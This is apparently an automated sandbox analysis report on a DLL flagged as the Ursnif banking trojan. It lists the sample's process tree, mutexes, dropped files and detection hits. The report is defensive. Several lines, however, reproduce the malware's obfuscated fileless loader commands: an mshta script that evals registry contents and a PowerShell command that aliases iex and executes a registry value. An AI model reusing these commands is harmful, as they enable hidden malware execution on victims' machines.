Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

PE / OLE file has an invalid certificate

Source: 6.dll

Static PE information: invalid certificate

Source: 6.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1

Source: classification engine

Classification label: mal100.troj.evad.winDLL@59/52@16/4

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F13309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_00F13309

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{542DFF7D-A3B8-A645-CDC8-873A517CAB0E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B0E37361-4FA3-62B8-59E4-F3B69D58D74A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{80FA9EC6-DFAB-B287-69B4-8306AD28679A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{EC2366C9-5BCE-FEAF-45E0-BF1249146366}

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: 6.dll

Static file information: File size 1781920 > 1048576

Source: 6.dll

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1B073 push ecx; ret	4_2_00F1B083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1E97E pushad ; iretd	4_2_00F1E982
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1AD40 push ecx; ret	4_2_00F1AD49

PE file contains an invalid checksum

Source: 6.dll	Static PE information: real checksum: 0x1ba6ec should be: 0x1b8278
Source: nigogz4l.dll.33.dr	Static PE information: real checksum: 0x0 should be: 0xee8b
Source: dtnsoflb.dll.43.dr	Static PE information: real checksum: 0x0 should be: 0x4b02
Source: nlbomp32.dll.35.dr	Static PE information: real checksum: 0x0 should be: 0xf45d
Source: uu5u2nmv.dll.40.dr	Static PE information: real checksum: 0x0 should be: 0xa363
Source: wklr4juq.dll.36.dr	Static PE information: real checksum: 0x0 should be: 0x1029d

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
